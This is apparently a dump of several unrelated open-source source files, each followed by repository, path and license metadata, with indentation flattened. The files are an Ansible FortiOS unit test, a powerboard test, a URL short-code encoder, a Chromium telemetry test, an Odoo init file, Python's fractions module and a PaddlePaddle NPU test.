return randomString(text_size), randomString(version_size)
# TODO might make sense to use sdk's api
def calc_taa_digest(text, version):
return WriteRequestManager._taa_digest(text, version)
|
apache-2.0
|
broferek/ansible
|
test/units/modules/network/fortios/test_fortios_user_domain_controller.py
|
21
|
8877
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_domain_controller
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_domain_controller.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_domain_controller_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_domain_controller_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_domain_controller_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'domain-controller', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_domain_controller_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'domain-controller', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_domain_controller_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_domain_controller_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'random_attribute_not_valid': 'tag',
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
gpl-3.0
|
orestkreminskyi/taf
|
unittests/test_pwsw.py
|
2
|
1228
|
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``test_pwsw.py``
`Unittests powerboard functions`
"""
import pytest
from testlib import powerboard
host = '127.0.0.1'
port = '12'
rw_community_string = 'private'
@pytest.mark.skipif("True", reason="Test case skipped by 'skiptest' marker")
def test_pwsw1():
status = powerboard.get_status(host, port, rw_community_string)
if status == "On":
powerboard.do_action(host, port, rw_community_string, powerboard.commands["Reset"])
elif status == "Off":
powerboard.do_action(host, port, rw_community_string, powerboard.commands["On"])
else:
raise Exception("Cannot determine device status.")
|
apache-2.0
|
mouradmourafiq/django-short-urls
|
short_urls/url_generator.py
|
1
|
1921
|
# -*- coding: utf-8 -*-
DEFAULT_ALPHABET = 'az7er5tyu1io0pq4sd9fg6hjk8lmw3xcv2bn'
LEGTH_GENERATION = 32
MIN_LENGTH = 6
class URLEncoder(object):
"""
It generates 36**6 = 2176782336 values (6 lowercase letters) which falls between 2**31 = 2147483648 and 2**32 = 4294967296.
It pads the codes that are shorter than 6 characters with leading 'a' characters,
"""
def __init__(self, alphabet=DEFAULT_ALPHABET, length_generation=LEGTH_GENERATION):
self.alphabet = alphabet
self.length_generation = length_generation
self.mask = (1 << length_generation) - 1
self.mapping = range(length_generation)
self.mapping.reverse()
def encode_url(self, n, min_length=MIN_LENGTH):
return self.__enbase(self.__encode(n), min_length)
def decode_url(self, n):
return self.__decode(self.__debase(n))
def __encode(self, n):
result = 0
for i, b in enumerate(self.mapping):
if (n & self.mask) & (1 << i):
result |= (1 << b)
return (n & ~self.mask) | result
def __decode(self, n):
result = 0
for i, b in enumerate(self.mapping):
if (n & self.mask) & (1 << b):
result |= (1 << i)
return (n & ~self.mask) | result
def __enbase(self, x, min_length=MIN_LENGTH):
result = self.__enbase_iter(x)
padding = self.alphabet[0] * (min_length - len(result))
return '%s%s' % (padding, result)
def __enbase_iter(self, x):
n = len(self.alphabet)
if x < n:
return self.alphabet[x]
return self.__enbase_iter(x / n) + self.alphabet[x % n]
def __debase(self, x):
n = len(self.alphabet)
result = 0
for i, c in enumerate(reversed(x)):
result += self.alphabet.index(c) * (n ** i)
return result
|
bsd-2-clause
|
hujiajie/chromium-crosswalk
|
tools/perf/measurements/rasterize_and_record_micro_unittest.py
|
26
|
4474
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry import decorators
from telemetry.page import page_test
from telemetry.testing import options_for_unittests
from telemetry.testing import page_test_test_case
from telemetry.util import wpr_modes
from measurements import rasterize_and_record_micro
class RasterizeAndRecordMicroUnitTest(page_test_test_case.PageTestTestCase):
"""Smoke test for rasterize_and_record_micro measurement
Runs rasterize_and_record_micro measurement on a simple page and verifies
that all metrics were added to the results. The test is purely functional,
i.e. it only checks if the metrics are present and non-zero.
"""
def setUp(self):
self._options = options_for_unittests.GetCopy()
self._options.browser_options.wpr_mode = wpr_modes.WPR_OFF
@decorators.Disabled('win', 'chromeos')
def testRasterizeAndRecordMicro(self):
ps = self.CreateStorySetFromFileInUnittestDataDir('blank.html')
measurement = rasterize_and_record_micro.RasterizeAndRecordMicro(
rasterize_repeat=1, record_repeat=1, start_wait_time=0.0,
report_detailed_results=True)
try:
results = self.RunMeasurement(measurement, ps, options=self._options)
except page_test.TestNotSupportedOnPlatformError as failure:
logging.warning(str(failure))
return
self.assertEquals(0, len(results.failures))
rasterize_time = results.FindAllPageSpecificValuesNamed('rasterize_time')
self.assertEquals(len(rasterize_time), 1)
self.assertGreater(rasterize_time[0].GetRepresentativeNumber(), 0)
record_time = results.FindAllPageSpecificValuesNamed('record_time')
self.assertEquals(len(record_time), 1)
self.assertGreater(record_time[0].GetRepresentativeNumber(), 0)
rasterized_pixels = results.FindAllPageSpecificValuesNamed(
'pixels_rasterized')
self.assertEquals(len(rasterized_pixels), 1)
self.assertGreater(rasterized_pixels[0].GetRepresentativeNumber(), 0)
recorded_pixels = results.FindAllPageSpecificValuesNamed('pixels_recorded')
self.assertEquals(len(recorded_pixels), 1)
self.assertGreater(recorded_pixels[0].GetRepresentativeNumber(), 0)
pixels_rasterized_with_non_solid_color = \
results.FindAllPageSpecificValuesNamed(
'pixels_rasterized_with_non_solid_color')
self.assertEquals(len(pixels_rasterized_with_non_solid_color), 1)
self.assertGreater(
pixels_rasterized_with_non_solid_color[0].GetRepresentativeNumber(), 0)
pixels_rasterized_as_opaque = \
results.FindAllPageSpecificValuesNamed('pixels_rasterized_as_opaque')
self.assertEquals(len(pixels_rasterized_as_opaque), 1)
self.assertGreater(
pixels_rasterized_as_opaque[0].GetRepresentativeNumber(), 0)
total_layers = results.FindAllPageSpecificValuesNamed('total_layers')
self.assertEquals(len(total_layers), 1)
self.assertGreater(total_layers[0].GetRepresentativeNumber(), 0)
total_picture_layers = \
results.FindAllPageSpecificValuesNamed('total_picture_layers')
self.assertEquals(len(total_picture_layers), 1)
self.assertGreater(total_picture_layers[0].GetRepresentativeNumber(), 0)
total_picture_layers_with_no_content = \
results.FindAllPageSpecificValuesNamed(
'total_picture_layers_with_no_content')
self.assertEquals(len(total_picture_layers_with_no_content), 1)
self.assertGreater(
total_picture_layers_with_no_content[0].GetRepresentativeNumber(), 0)
total_picture_layers_off_screen = \
results.FindAllPageSpecificValuesNamed(
'total_picture_layers_off_screen')
self.assertEquals(len(total_picture_layers_off_screen), 1)
self.assertEqual(
total_picture_layers_off_screen[0].GetRepresentativeNumber(), 0)
viewport_picture_size = \
results.FindAllPageSpecificValuesNamed('viewport_picture_size')
self.assertEquals(len(viewport_picture_size), 1)
self.assertGreater(
viewport_picture_size[0].GetRepresentativeNumber(), 0)
total_size_of_pictures_in_piles = \
results.FindAllPageSpecificValuesNamed(
'total_size_of_pictures_in_piles')
self.assertEquals(len(total_size_of_pictures_in_piles), 1)
self.assertGreater(
total_size_of_pictures_in_piles[0].GetRepresentativeNumber(), 0)
|
bsd-3-clause
|
jaxkodex/odoo
|
addons/l10n_fr/report/__init__.py
|
424
|
1475
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Voluntarynet/BitmessageKit
|
BitmessageKit/Vendor/static-python/Lib/fractions.py
|
252
|
22390
|
# Originally contributed by Sjoerd Mullender.
# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>.
"""Rational, infinite-precision, real numbers."""
from __future__ import division
from decimal import Decimal
import math
import numbers
import operator
import re
__all__ = ['Fraction', 'gcd']
Rational = numbers.Rational
def gcd(a, b):
"""Calculate the Greatest Common Divisor of a and b.
Unless b==0, the result will have the same sign as b (so that when
b is divided by it, the result comes out positive).
"""
while b:
a, b = b, a%b
return a
_RATIONAL_FORMAT = re.compile(r"""
\A\s* # optional whitespace at the start, then
(?P<sign>[-+]?) # an optional sign, then
(?=\d|\.\d) # lookahead for digit or .digit
(?P<num>\d*) # numerator (possibly empty)
(?: # followed by
(?:/(?P<denom>\d+))? # an optional denominator
| # or
(?:\.(?P<decimal>\d*))? # an optional fractional part
(?:E(?P<exp>[-+]?\d+))? # and optional exponent
)
\s*\Z # and optional whitespace to finish
""", re.VERBOSE | re.IGNORECASE)
class Fraction(Rational):
"""This class implements rational numbers.
In the two-argument form of the constructor, Fraction(8, 6) will
produce a rational number equivalent to 4/3. Both arguments must
be Rational. The numerator defaults to 0 and the denominator
defaults to 1 so that Fraction(3) == 3 and Fraction() == 0.
Fractions can also be constructed from:
- numeric strings similar to those accepted by the
float constructor (for example, '-2.3' or '1e10')
- strings of the form '123/456'
- float and Decimal instances
- other Rational instances (including integers)
"""
__slots__ = ('_numerator', '_denominator')
# We're immutable, so use __new__ not __init__
def __new__(cls, numerator=0, denominator=None):
"""Constructs a Fraction.
Takes a string like '3/2' or '1.5', another Rational instance, a
numerator/denominator pair, or a float.
Examples
--------
>>> Fraction(10, -8)
Fraction(-5, 4)
>>> Fraction(Fraction(1, 7), 5)
Fraction(1, 35)
>>> Fraction(Fraction(1, 7), Fraction(2, 3))
Fraction(3, 14)
>>> Fraction('314')
Fraction(314, 1)
>>> Fraction('-35/4')
Fraction(-35, 4)
>>> Fraction('3.1415') # conversion from numeric string
Fraction(6283, 2000)
>>> Fraction('-47e-2') # string may include a decimal exponent
Fraction(-47, 100)
>>> Fraction(1.47) # direct construction from float (exact conversion)
Fraction(6620291452234629, 4503599627370496)
>>> Fraction(2.25)
Fraction(9, 4)
>>> Fraction(Decimal('1.47'))
Fraction(147, 100)
"""
self = super(Fraction, cls).__new__(cls)
if denominator is None:
if isinstance(numerator, Rational):
self._numerator = numerator.numerator
self._denominator = numerator.denominator
return self
elif isinstance(numerator, float):
# Exact conversion from float
value = Fraction.from_float(numerator)
self._numerator = value._numerator
self._denominator = value._denominator
return self
elif isinstance(numerator, Decimal):
value = Fraction.from_decimal(numerator)
self._numerator = value._numerator
self._denominator = value._denominator
return self
elif isinstance(numerator, basestring):
# Handle construction from strings.
m = _RATIONAL_FORMAT.match(numerator)
if m is None:
raise ValueError('Invalid literal for Fraction: %r' %
numerator)
numerator = int(m.group('num') or '0')
denom = m.group('denom')
if denom:
denominator = int(denom)
else:
denominator = 1
decimal = m.group('decimal')
if decimal:
scale = 10**len(decimal)
numerator = numerator * scale + int(decimal)
denominator *= scale
exp = m.group('exp')
if exp:
exp = int(exp)
if exp >= 0:
numerator *= 10**exp
else:
denominator *= 10**-exp
if m.group('sign') == '-':
numerator = -numerator
else:
raise TypeError("argument should be a string "
"or a Rational instance")
elif (isinstance(numerator, Rational) and
isinstance(denominator, Rational)):
numerator, denominator = (
numerator.numerator * denominator.denominator,
denominator.numerator * numerator.denominator
)
else:
raise TypeError("both arguments should be "
"Rational instances")
if denominator == 0:
raise ZeroDivisionError('Fraction(%s, 0)' % numerator)
g = gcd(numerator, denominator)
self._numerator = numerator // g
self._denominator = denominator // g
return self
@classmethod
def from_float(cls, f):
"""Converts a finite float to a rational number, exactly.
Beware that Fraction.from_float(0.3) != Fraction(3, 10).
"""
if isinstance(f, numbers.Integral):
return cls(f)
elif not isinstance(f, float):
raise TypeError("%s.from_float() only takes floats, not %r (%s)" %
(cls.__name__, f, type(f).__name__))
if math.isnan(f) or math.isinf(f):
raise TypeError("Cannot convert %r to %s." % (f, cls.__name__))
return cls(*f.as_integer_ratio())
@classmethod
def from_decimal(cls, dec):
"""Converts a finite Decimal instance to a rational number, exactly."""
from decimal import Decimal
if isinstance(dec, numbers.Integral):
dec = Decimal(int(dec))
elif not isinstance(dec, Decimal):
raise TypeError(
"%s.from_decimal() only takes Decimals, not %r (%s)" %
(cls.__name__, dec, type(dec).__name__))
if not dec.is_finite():
# Catches infinities and nans.
raise TypeError("Cannot convert %s to %s." % (dec, cls.__name__))
sign, digits, exp = dec.as_tuple()
digits = int(''.join(map(str, digits)))
if sign:
digits = -digits
if exp >= 0:
return cls(digits * 10 ** exp)
else:
return cls(digits, 10 ** -exp)
def limit_denominator(self, max_denominator=1000000):
"""Closest Fraction to self with denominator at most max_denominator.
>>> Fraction('3.141592653589793').limit_denominator(10)
Fraction(22, 7)
>>> Fraction('3.141592653589793').limit_denominator(100)
Fraction(311, 99)
>>> Fraction(4321, 8765).limit_denominator(10000)
Fraction(4321, 8765)
"""
# Algorithm notes: For any real number x, define a *best upper
# approximation* to x to be a rational number p/q such that:
#
# (1) p/q >= x, and
# (2) if p/q > r/s >= x then s > q, for any rational r/s.
#
# Define *best lower approximation* similarly. Then it can be
# proved that a rational number is a best upper or lower
# approximation to x if, and only if, it is a convergent or
# semiconvergent of the (unique shortest) continued fraction
# associated to x.
#
# To find a best rational approximation with denominator <= M,
# we find the best upper and lower approximations with
# denominator <= M and take whichever of these is closer to x.
# In the event of a tie, the bound with smaller denominator is
# chosen. If both denominators are equal (which can happen
# only when max_denominator == 1 and self is midway between
# two integers) the lower bound---i.e., the floor of self, is
# taken.
if max_denominator < 1:
raise ValueError("max_denominator should be at least 1")
if self._denominator <= max_denominator:
return Fraction(self)
p0, q0, p1, q1 = 0, 1, 1, 0
n, d = self._numerator, self._denominator
while True:
a = n//d
q2 = q0+a*q1
if q2 > max_denominator:
break
p0, q0, p1, q1 = p1, q1, p0+a*p1, q2
n, d = d, n-a*d
k = (max_denominator-q0)//q1
bound1 = Fraction(p0+k*p1, q0+k*q1)
bound2 = Fraction(p1, q1)
if abs(bound2 - self) <= abs(bound1-self):
return bound2
else:
return bound1
@property
def numerator(a):
return a._numerator
@property
def denominator(a):
return a._denominator
def __repr__(self):
"""repr(self)"""
return ('Fraction(%s, %s)' % (self._numerator, self._denominator))
def __str__(self):
"""str(self)"""
if self._denominator == 1:
return str(self._numerator)
else:
return '%s/%s' % (self._numerator, self._denominator)
def _operator_fallbacks(monomorphic_operator, fallback_operator):
"""Generates forward and reverse operators given a purely-rational
operator and a function from the operator module.
Use this like:
__op__, __rop__ = _operator_fallbacks(just_rational_op, operator.op)
In general, we want to implement the arithmetic operations so
that mixed-mode operations either call an implementation whose
author knew about the types of both arguments, or convert both
to the nearest built in type and do the operation there. In
Fraction, that means that we define __add__ and __radd__ as:
def __add__(self, other):
# Both types have numerators/denominator attributes,
# so do the operation directly
if isinstance(other, (int, long, Fraction)):
return Fraction(self.numerator * other.denominator +
other.numerator * self.denominator,
self.denominator * other.denominator)
# float and complex don't have those operations, but we
# know about those types, so special case them.
elif isinstance(other, float):
return float(self) + other
elif isinstance(other, complex):
return complex(self) + other
# Let the other type take over.
return NotImplemented
def __radd__(self, other):
# radd handles more types than add because there's
# nothing left to fall back to.
if isinstance(other, Rational):
return Fraction(self.numerator * other.denominator +
other.numerator * self.denominator,
self.denominator * other.denominator)
elif isinstance(other, Real):
return float(other) + float(self)
elif isinstance(other, Complex):
return complex(other) + complex(self)
return NotImplemented
There are 5 different cases for a mixed-type addition on
Fraction. I'll refer to all of the above code that doesn't
refer to Fraction, float, or complex as "boilerplate". 'r'
will be an instance of Fraction, which is a subtype of
Rational (r : Fraction <: Rational), and b : B <:
Complex. The first three involve 'r + b':
1. If B <: Fraction, int, float, or complex, we handle
that specially, and all is well.
2. If Fraction falls back to the boilerplate code, and it
were to return a value from __add__, we'd miss the
possibility that B defines a more intelligent __radd__,
so the boilerplate should return NotImplemented from
__add__. In particular, we don't handle Rational
here, even though we could get an exact answer, in case
the other type wants to do something special.
3. If B <: Fraction, Python tries B.__radd__ before
Fraction.__add__. This is ok, because it was
implemented with knowledge of Fraction, so it can
handle those instances before delegating to Real or
Complex.
The next two situations describe 'b + r'. We assume that b
didn't know about Fraction in its implementation, and that it
uses similar boilerplate code:
4. If B <: Rational, then __radd_ converts both to the
builtin rational type (hey look, that's us) and
proceeds.
5. Otherwise, __radd__ tries to find the nearest common
base ABC, and fall back to its builtin type. Since this
class doesn't subclass a concrete type, there's no
implementation to fall back to, so we need to try as
hard as possible to return an actual value, or the user
will get a TypeError.
"""
def forward(a, b):
if isinstance(b, (int, long, Fraction)):
return monomorphic_operator(a, b)
elif isinstance(b, float):
return fallback_operator(float(a), b)
elif isinstance(b, complex):
return fallback_operator(complex(a), b)
else:
return NotImplemented
forward.__name__ = '__' + fallback_operator.__name__ + '__'
forward.__doc__ = monomorphic_operator.__doc__
def reverse(b, a):
if isinstance(a, Rational):
# Includes ints.
return monomorphic_operator(a, b)
elif isinstance(a, numbers.Real):
return fallback_operator(float(a), float(b))
elif isinstance(a, numbers.Complex):
return fallback_operator(complex(a), complex(b))
else:
return NotImplemented
reverse.__name__ = '__r' + fallback_operator.__name__ + '__'
reverse.__doc__ = monomorphic_operator.__doc__
return forward, reverse
def _add(a, b):
"""a + b"""
return Fraction(a.numerator * b.denominator +
b.numerator * a.denominator,
a.denominator * b.denominator)
__add__, __radd__ = _operator_fallbacks(_add, operator.add)
def _sub(a, b):
"""a - b"""
return Fraction(a.numerator * b.denominator -
b.numerator * a.denominator,
a.denominator * b.denominator)
__sub__, __rsub__ = _operator_fallbacks(_sub, operator.sub)
def _mul(a, b):
"""a * b"""
return Fraction(a.numerator * b.numerator, a.denominator * b.denominator)
__mul__, __rmul__ = _operator_fallbacks(_mul, operator.mul)
def _div(a, b):
"""a / b"""
return Fraction(a.numerator * b.denominator,
a.denominator * b.numerator)
__truediv__, __rtruediv__ = _operator_fallbacks(_div, operator.truediv)
__div__, __rdiv__ = _operator_fallbacks(_div, operator.div)
def __floordiv__(a, b):
"""a // b"""
# Will be math.floor(a / b) in 3.0.
div = a / b
if isinstance(div, Rational):
# trunc(math.floor(div)) doesn't work if the rational is
# more precise than a float because the intermediate
# rounding may cross an integer boundary.
return div.numerator // div.denominator
else:
return math.floor(div)
def __rfloordiv__(b, a):
"""a // b"""
# Will be math.floor(a / b) in 3.0.
div = a / b
if isinstance(div, Rational):
# trunc(math.floor(div)) doesn't work if the rational is
# more precise than a float because the intermediate
# rounding may cross an integer boundary.
return div.numerator // div.denominator
else:
return math.floor(div)
def __mod__(a, b):
"""a % b"""
div = a // b
return a - b * div
def __rmod__(b, a):
"""a % b"""
div = a // b
return a - b * div
def __pow__(a, b):
"""a ** b
If b is not an integer, the result will be a float or complex
since roots are generally irrational. If b is an integer, the
result will be rational.
"""
if isinstance(b, Rational):
if b.denominator == 1:
power = b.numerator
if power >= 0:
return Fraction(a._numerator ** power,
a._denominator ** power)
else:
return Fraction(a._denominator ** -power,
a._numerator ** -power)
else:
# A fractional power will generally produce an
# irrational number.
return float(a) ** float(b)
else:
return float(a) ** b
def __rpow__(b, a):
"""a ** b"""
if b._denominator == 1 and b._numerator >= 0:
# If a is an int, keep it that way if possible.
return a ** b._numerator
if isinstance(a, Rational):
return Fraction(a.numerator, a.denominator) ** b
if b._denominator == 1:
return a ** b._numerator
return a ** float(b)
def __pos__(a):
"""+a: Coerces a subclass instance to Fraction"""
return Fraction(a._numerator, a._denominator)
def __neg__(a):
"""-a"""
return Fraction(-a._numerator, a._denominator)
def __abs__(a):
"""abs(a)"""
return Fraction(abs(a._numerator), a._denominator)
def __trunc__(a):
"""trunc(a)"""
if a._numerator < 0:
return -(-a._numerator // a._denominator)
else:
return a._numerator // a._denominator
def __hash__(self):
"""hash(self)
Tricky because values that are exactly representable as a
float must have the same hash as that float.
"""
# XXX since this method is expensive, consider caching the result
if self._denominator == 1:
# Get integers right.
return hash(self._numerator)
# Expensive check, but definitely correct.
if self == float(self):
return hash(float(self))
else:
# Use tuple's hash to avoid a high collision rate on
# simple fractions.
return hash((self._numerator, self._denominator))
def __eq__(a, b):
"""a == b"""
if isinstance(b, Rational):
return (a._numerator == b.numerator and
a._denominator == b.denominator)
if isinstance(b, numbers.Complex) and b.imag == 0:
b = b.real
if isinstance(b, float):
if math.isnan(b) or math.isinf(b):
# comparisons with an infinity or nan should behave in
# the same way for any finite a, so treat a as zero.
return 0.0 == b
else:
return a == a.from_float(b)
else:
# Since a doesn't know how to compare with b, let's give b
# a chance to compare itself with a.
return NotImplemented
def _richcmp(self, other, op):
"""Helper for comparison operators, for internal use only.
Implement comparison between a Rational instance `self`, and
either another Rational instance or a float `other`. If
`other` is not a Rational instance or a float, return
NotImplemented. `op` should be one of the six standard
comparison operators.
"""
# convert other to a Rational instance where reasonable.
if isinstance(other, Rational):
return op(self._numerator * other.denominator,
self._denominator * other.numerator)
# comparisons with complex should raise a TypeError, for consistency
# with int<->complex, float<->complex, and complex<->complex comparisons.
if isinstance(other, complex):
raise TypeError("no ordering relation is defined for complex numbers")
if isinstance(other, float):
if math.isnan(other) or math.isinf(other):
return op(0.0, other)
else:
return op(self, self.from_float(other))
else:
return NotImplemented
def __lt__(a, b):
"""a < b"""
return a._richcmp(b, operator.lt)
def __gt__(a, b):
"""a > b"""
return a._richcmp(b, operator.gt)
def __le__(a, b):
"""a <= b"""
return a._richcmp(b, operator.le)
def __ge__(a, b):
"""a >= b"""
return a._richcmp(b, operator.ge)
def __nonzero__(a):
"""a != 0"""
return a._numerator != 0
# support for pickling, copy, and deepcopy
def __reduce__(self):
return (self.__class__, (str(self),))
def __copy__(self):
if type(self) == Fraction:
return self # I'm immutable; therefore I am my own clone
return self.__class__(self._numerator, self._denominator)
def __deepcopy__(self, memo):
if type(self) == Fraction:
return self # My components are also immutable
return self.__class__(self._numerator, self._denominator)
|
mit
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/test_elementwise_max_op_npu.py
|
2
|
5125
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import unittest
import sys
sys.path.append("..")
from op_test import OpTest
import paddle
import paddle.fluid as fluid
paddle.enable_static()
SEED = 2021
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMax(OpTest):
def setUp(self):
self.set_npu()
self.op_type = "elementwise_max"
self.place = paddle.NPUPlace(0)
self.init_dtype()
np.random.seed(SEED)
x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
y = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
out = np.maximum(x, y)
self.inputs = {
'X': OpTest.np_dtype_to_fluid_dtype(x),
'Y': OpTest.np_dtype_to_fluid_dtype(y)
}
self.attrs = {}
self.outputs = {'Out': out}
def set_npu(self):
self.__class__.use_npu = True
def init_dtype(self):
self.dtype = np.float32
def test_check_output(self):
self.check_output_with_place(self.place, check_dygraph=False)
